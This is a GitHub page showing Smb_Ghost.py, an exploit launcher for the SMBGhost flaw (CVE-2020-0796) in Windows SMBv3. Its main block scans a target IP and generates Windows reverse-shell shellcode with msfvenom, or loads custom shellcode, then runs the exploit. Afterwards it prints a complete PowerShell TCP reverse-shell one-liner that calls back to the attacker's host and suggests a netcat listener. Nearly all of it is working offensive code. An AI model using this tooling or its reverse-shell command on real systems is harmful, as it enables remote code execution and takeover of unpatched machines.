-
Notifications
You must be signed in to change notification settings - Fork 52
/
Smb_Ghost.py
executable file
·199 lines (166 loc) · 14.4 KB
/
Smb_Ghost.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
#!/usr/bin/env python3
import binascii
import argparse
import subprocess
import base64
import readline
from Scanner.scanner import scanner_smb_ghost
from Scanner.logless_scanner import scanner_smb_ghost_silent
from RCE import exploit
# Exploit Title: SMB Ghost detection and exploitation
# Date: 05/06/2020
# Author: @_Barriuso
# Tested on: Microsoft Windows [Versión 10.0.18362.113]. Build 1903
# CVE : CVE-2020-0796
# Twitter: https://twitter.com/_Barriuso
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
banner = base64.b64decode(
"Y2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2M6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo7Ozs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCwsLCcnJycnJycnJycnJycnJycnJwpjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2M6Y29keGtPMDAwT2treG9sOjs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7OywsLCwsLCwsLCwsLCwsLCwsLCwnJycnJycnJycnJycnJycnCmNjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjbHgwTldNTU1NTU1NTU1XV05LT2RjOzs7Ozs6Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsLCcnJycnJycnJycnJycnJycKbGxsbGNjY2NjY2NjY2NjY2NjY2NjY2NjbGtYV01NTU1NTU1NTU1NTU1NTU1NV0t4Ojs7Ozs7Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsLCcnJycnJycnJycnJycnJwpjY2xsbGxsY2NjY2NjY2NjY2NjY2NjY28wV01NTU1NTU1NTU1NTU1NTU1NTU1NTVcwbCw7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCwnJycnJycnJycnJycnCmxsbGxsY2NjY2NjY2NjY2NjY2NjY2NvS1dNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTVcweGMsOzo6Ozs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCwsJycnJycnJycnJycKbGxsbGxjY2xsbGNjY2NjY2NjY2NjbzBXTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTVdXeCwsOjo6Ojo6Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsLCwnJycnJycnJwpsbGxsbGxsbGxsbGxsbGNjY2NjY2NrV01NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTVcwOiw7Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwnJycnJycnCmxsbGxsbGxsbGxsbGxsbGxjY2Njb1hNTU1NTU1NTU1NTVhkY2RYTU1NTU1NTU1NTU1NTUtjLDo6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCwsJycKbGxsbGxsbGxsbGxsbGxsY2xsY2NPV01NTU1NTU1NTVdPLCAgJzBNTU1NTmt4WE1NTU1NMDosOmNjY2M6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsJwpsbGxsbGxsbGxsbGxsbGxjbGxjb0tNTU1NTU1NTU1NMCcgIC5vTk1NTVd4Li54TU1NV1drOzs6Y2NjY2NjY2NjOjo6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsCmxsbGxsbGxsbGxsbGxsbGxsY2NPV01NTU1NTU1NTU1kICAuZE5NTU1NTmMgIG9XTU1OS28sOjpjY2NjY2NjY2NjY2NjY2NjYzo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7LCwsLCwsLCwKbGxsbGxsbGxsbGxsbGxsbGxjZFhNTU1NTU1NTU1NTUtkeEtXTU1NTU1OYyAua01NV09sOiw6Y2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjOjo6Ojo6Ojo7Ozs7Ozs7LCwsLApsbGxsbGxsbGxsbGxsbGxsY29LV01NTU1NTU1NTU1NTU1NTU1YZG9YTU1rLGxOTU1YbCcsOzpjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjYzo6Ozs7OywsCmxsbGxsbGxsbGxsbGxsbGNsMFdXTU1NTU1NTU1NV1hYV01NTU5reFhNTVdOV01NTmQsLDs6Y2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjbGxsbGxsbGxsbGxsbGM6Ozs7LCwKbGxsbGxsbGxsbGxsbGxjbE9OV1dXTU1NTU1NTU1XWEtLS0tLS1hOV01NTU1NTU1POiw6OmNjY2NjY2NjY2NjY2NjY2NjY2xsbGxsbGxsbGxsbGxsbGxvb29vb29sYzo7Ozs7LApsbGxsbGxsbGxsbGxsbGxPTldXV1dNTU1NTU1NTU1NTU1XTlhYS0tLS0tOV01NTm8sOjpjY2NjY2NjbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxvb29vb2xjOjs7OzssCmxsbGxsbGxsbGxsbGxsa05XV1dXTU1NTU1NTU1NTU1NTU1NTU1NTU1XTk5XTU1POiw6Y2NjY2NjY2xsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsb29vb29vb29vbGM6Ozs7LCwKbGxsbGxsbGxsbGxsb09OV1dXV1dNTU1NTU1XV1dNTU1NTU1NTU1NTU1NTU1NV2QsOzpjY2NjY2NjY2xsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsb29vb29vb29sYzo7OzssLApsbGxsbGxsbGxsbG8wV1dXV1dXTU1NTU1NWGtveDBOTldNTU1NTU1NTU1NTU1LYyw6Y2NjY2NjY2NjbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbG9vb2xjOzs7LCwsCmxsbGxsbGxsbGxkS1dNV1dXV1dNTU1NTVd4Li4nbGQ7bFgweDBYTldNV01XV086OzpjY2NjY2NjY2NsbGxsbGxsbGxsbGxsbGNjbGxsbGxsbGxsbGxsbGxsbGxsbDo7OywsLCwKbGxsbGxsbGxvT05NV1dXV1dXV01NTU1NWG87Li5sbC4uLC4ubzo7bGwwV01Xazs7OmNjY2NjY2NjY2xsbGxsbGxsbGxsbGxsY2NjbGxsbGxsbGxsbGxsbGxsbGxsOjs7LCwsLApsbGxsbGxkT1hXTU1XV1dXV1dNTU1NTU1XWE9rMGtkZG87LmNvLicnLmtNTVd4Ozs6Y2NjY2NjY2NjY2xjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2M6OywsLCwsCmxsbGxvT1hXV01XV1dXV1dXTU1NTU1NV1dXV1dXTU1NV0trT2RjbDtjS1dNV3g7OmNjY2NjY2NjY2NjbGxjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjYzo7LCwsLCwKbGxva1hXV01XV1dXV1dXV01NTU1NTU1XV1dXV01NTU1NTU1NTU1XTk5XV01XTzo7Y2NjY2NjY2NjY2xsbGxsbGxsbGxsbGxsY2NjbGxsbGxsbGxsbGxsbGxsbGxjOjssLCwsLApsbzBOV1dXV1dXV1dXV1dNTU1NTU1NV1dXV1dXTU1NTU1NTU1NTVdXV1dXV01YbDs6Y2NjY2NjY2NjbGxsbGxsbGxsbGxsbGxjY2xsbGxsbGxsbGxsbGxsbGxsbGw6OywsLCwsCmxPV1dXV1dXV1dXV1dNTU1NTU1NTVdXV1dXV01NTU1NTU1NTU1NV1dXV1dNTVdPYzpjY2NjY2NjY2xsbGxsbGxsbGxsbGxsbGxjbGxsbGxsbGxsbGxsbGxsbGxsbDo7LCwsLCwKbGRLV1dXV1gwMFhXTU1NTU1NTU1XV1dXV1dXTU1NTU1NTU1NTU1XV1dXV1dNTVdrOjpjY2NjY2NjbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxjOjssLCwsJwpsY2xvZGRvYzs7eFdNTU1NTU1NV1dXV1dXV1dNTU1NTU1NTU1NTVdXV1dXV01NTVhvOjpjY2NjY2xsbG9sbGxsbGxsbGxsbGxsY2xsbGxsbGxsbGxsbGxsY2NjbGM6OywsLCwnCm9sbGNjY2NjYzp4Tk1NTU1NTVdXV1dXV1dXV01NTU1NTU1NTU1NV1dXV1dXTU1NV09jOzpjY2NjY2xsbGxsbGxjY2NsbGNjY2NjY2NjY2NjY2NjY2NjY2NjY2NjYzosLCwsLCcKb2xsb29vb2xsbGtXTU1NTU1XV1dXV05LMEtOTU1NTU1NTU1NTU1XV1dXV1dXTU1NWG8sOzpjY2NjY2NjY2NjYzpjY2NjY2NjYzpjY2NjY2NjY2NjY2NjY2NjY2NjOiwsLCwnJwpvbG9vb29vb2xsT1dNTU1NV1dXTkt4bDo7OmxPTldNTU1NTU1NTVdXV1dXV1dNTU1XeDs7OmNjY2NjY2NjYzo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OmNjYzo7LCwsLCcnCm9vb29vb29sbGxkS1dNTU1XWE9vOjs7OmNjOjp4Tk1NTU1NTU0wb2Nva1hXV01NTU1PbDo7OmNjY2NjY2M6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7LCwsLCwsJycKb29vbGxsbGxsbGNseE9Pa2RjOzs6Y2NsbGxsY2NrV01NTU1NWG8sOzs7Y3hYV01NV09jOjs6Y2M6OjpjYzo6Ojo6Ojo6Ojo6Ojo6Ojo6Ozs7Ozs7OzssLCwsLCwsLCwsLCcnJwpvbGxsbGxsbGxsbGNjOjo7OjpjbGxsbGxsbGxsY2xPTldNTVdrOztjYzo6OmNka094Yyw7OmNjY2M6Y2NjOjo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7OywsLCwsLCwsLCwsLCwnJycnCmxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxjY2NveGt4bzs7OmNjY2NjOjs7Ozs7Ojo6Y2NjYzo6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsJycnJycKbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxjYzo6Ozs7OmNjY2NjY2NjY2NjOmNjY2M6Ojo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwnJycnJwpvbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGNjY2NjY2NjY2NjY2NjY2NjY2NjY2NjOjo6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCcnJycnCm9sbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGNjY2NjY2NjY2NjY2NjY2NjY2M6Ojo6Ojo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7Ozs7OywsLCwsLCwsLCwsLCwsLCcnJycnJycKb2xsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxjY2NjY2NjY2NjY2NjY2NjYzo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsJycnJycnJwpsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsY2NjY2NjY2NjY2NjY2NjY2M6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo7Ozs7Ozs7Ozs7Ozs7OywsLCwsLCwsLCwsLCwsLCwsJycnJycnCmxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsY2NjY2NjY2NjY2NjY2NjY2NjYzo6Ojo6Ojo6Ojo6Ojo6Ojo6Ozs7Ozs7Ozs7Ozs7Ozs7LCwsLCwsLCwsLCwsLCwsLCwsJycnJycKbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGxsbGNjY2NjY2NjY2NjY2NjY2NjY2NjOjo6Ojo6Ojo6Ojo6Ojo6Ojo7Ozs7Ozs7Ozs7Ozs7OzssLCwsLCwsLCwsLCwsLCwsLCwnJycnJwo=").decode()
print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END)
def get_args():
parser = argparse.ArgumentParser(description='SMBGhost Detection and Exploitation')
parser.add_argument('-i', '--ip', dest='ip', type=str, required=True, help='IP address')
parser.add_argument('-p', '--port', dest='port', type=int, default="445", help='SMB Port')
parser.add_argument('--check', dest='check_vuln', action="store_true", default=False,
help='Check SMBGhost Vulnerability')
parser.add_argument('-e', dest='exploit', action="store_true", default=False, help='Directly exploit SMBGhost')
parser.add_argument('--lhost', dest='lhost', type=str, help='Lhost for the reverse shell')
parser.add_argument('--lport', dest='lport', type=str, help='Lport for the reverse shell')
parser.add_argument('--arch', dest='arch', type=str, default="x64",
help='Architecture of the target Windows Machine')
parser.add_argument('--silent', dest='silent', action="store_true", default=False,
help='Silent mode for the scanner') # I should remove this in the future
parser.add_argument('--shellcode', dest='shellcode_menu', action="store_true", default=False,
help='Shellcode Menu to import your shell')
parser.add_argument('--load-shellcode', dest='load_shellcode',
help='Load shellcode directly from file')
return parser.parse_args()
def load_shellcode(filePath):
try:
with open(filePath, 'r') as shellcode_file:
file_shellcode = shellcode_file.read()
file_shellcode = file_shellcode.strip()
#print ("SHELL CODE",file_shellcode)
except:
print((" [!] WARNING: path not found"))
return None
if len(file_shellcode) == 0:
print(" [!] WARNING: no custom shellcode restrieved", )
return None
# check if the shellcode was passed in as string-escaped form (Took it from VEIL Source Code)
if file_shellcode[0:2] == "\\x" and file_shellcode[4:6] == "\\x":
file_shellcode = file_shellcode.replace("\\x", "")
#print("SHELL 2 Ripped X", file_shellcode)
return bytes.fromhex(file_shellcode)
else:
# otherwise encode the raw data as a hex string
hexString = binascii.hexlify(file_shellcode)
file_shellcode = "\\x" + "\\x".join([hexString[i:i + 2] for i in range(0, len(hexString), 2)])
file_shellcode = file_shellcode.replace("\\x", "")
#print("SHELL 3 Ripped X", file_shellcode)
return bytes.fromhex(file_shellcode)
def menu_shellcode():
print("Please choose one option: \n")
print('1: Custom shellcode string')
print('2: File with shellcode (\\x41\\x42..)')
print('3: Binary file with shellcode\n')
try:
choose = int(input())
except:
print (Color.RED+"Please choose a valid number")
if (choose == 2 or choose == 3):
readline.set_completer_delims(' \t\n=')
readline.parse_and_bind("tab: complete")
filePath = input("Tab complete a file: ")
return load_shellcode(filePath)
if (choose == 1):
file_shellcode = input("Please enter custom shellcode (one line, no quotes, \\x00.. format): ")
file_shellcode = file_shellcode.replace("\\x", "")
#print("SHELL Ripped X", file_shellcode)
return bytes.fromhex(file_shellcode)
if (choose != 1 or choose != 2 or choose != 3):
print (Color.RED+"You chose an incorrect option")
def generate_shellcode(lhost, lport, arch):
print(Color.BLUE + "Generating Shellcode %s with lhost %s and lport %s" % (arch, lhost, lport))
if (arch == "x64"):
msf_payload = "windows/x64/shell_reverse_tcp"
else:
msf_payload = "windows/shell_reverse_tcp"
# generate the msfvenom command
msf_command = 'msfvenom -p ' + msf_payload + ' '
msf_command += "LHOST=" + lhost + " LPORT=" + str(lport)
# add final part to command to narrow down the msf output
msf_command += " -f hex"
# Run the command and get output
print("MSF command ->", msf_command)
return bytes.fromhex((subprocess.check_output(msf_command, shell=True).decode('ascii')))
if __name__ == '__main__':
args = get_args()
lhost = args.lhost
lport = args.lport
print(Color.BLUE + "The target is %s:%s" % (args.ip, args.port))
if (args.check_vuln):
if (args.silent):
if (scanner_smb_ghost_silent(args.ip, args.port)):
print(Color.RED+"The host is probably vulnerable")
else:
if (scanner_smb_ghost(args.ip, args.port)):
print(Color.RED+"The host is probably vulnerable")
if (args.exploit):
if (args.load_shellcode == None and args.shellcode_menu == False):
if (lhost == None or lport == None):
print(
Color.RED + "It seems you have forgotten to put LHOST, LPORT, ARCH options. \n Do you want to set it?")
lhost = str(input("Enter the Lhost : "))
lport = int(input("Enter the Lport : "))
args.arch = str(input("Enter the target architecture (Default: x64) : ") or "x64")
shell = generate_shellcode(lhost, lport, args.arch)
if (shell != None):
input(
Color.RED + "Please open your netcat session in a new tab before launch exploit. Press any key to continue \n nc -lvp %s" % lport)
result = exploit.exploit_SMBGhost(args.ip, args.port, shell)
result=0
if (result == 0):
works = str(input ("Did the exploit works? [Y/N] (Default: Y): ") or "Y")
if (works == "Y"):
print(Color.BLUE + "Exploit finnished. Enjoy your reverse shell =) ")
print(
"\n TIP: You should migrate to a new session, because SMB will kill your current session in ~ 10 minutes ~. \n FOR EXAMPLE: \n ")
print(
Color.BLUE + "START /B powershell.exe -c \"$c = New-Object System.Net.Sockets.TCPClient('" + lhost + "'," + "'443'" + ");$str = $c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $str.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sendback = (iex $d 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sb = ([text.encoding]::ASCII).GetBytes($sendback2);$str.Write($sb,0,$sb.Length);$str.Flush()};$c.Close()\" \n")
print ("More examples on -> https://github.com/Hackplayers/ReverseShell")
else:
again = str(input("Do you want to launch it again? [Y/N] (Default: N) ") or "N")
if (again == "Y"):
print ("Launching attack second time")
exploit.exploit_SMBGhost(args.ip, args.port, shell)
else:
print(Color.RED + "It seems there is a problem generating the shell")
elif (args.load_shellcode != None and args.shellcode_menu == False):
shell = load_shellcode(args.load_shellcode)
if (shell != None):
print(Color.BLUE + "Exploiting wiht custom shellcode")
result = exploit.exploit_SMBGhost(args.ip, args.port, shell)
if (result == 0):
print(Color.BLUE + "Exploit finnished. Enjoy your reverse shell =)", result)
else:
print(Color.RED + "Problem accessing your shellcode")
elif (args.shellcode_menu == True):
shell = menu_shellcode()
if (shell != None):
print(Color.BLUE + "Exploiting wiht custom shellcode")
result = exploit.exploit_SMBGhost(args.ip, args.port, shell)
if (result == 0):
print(Color.BLUE + "Exploit finnished. Enjoy your reverse shell =)", result)
else:
print("You put invalid options. Shellcode menu is different than load_shellcode")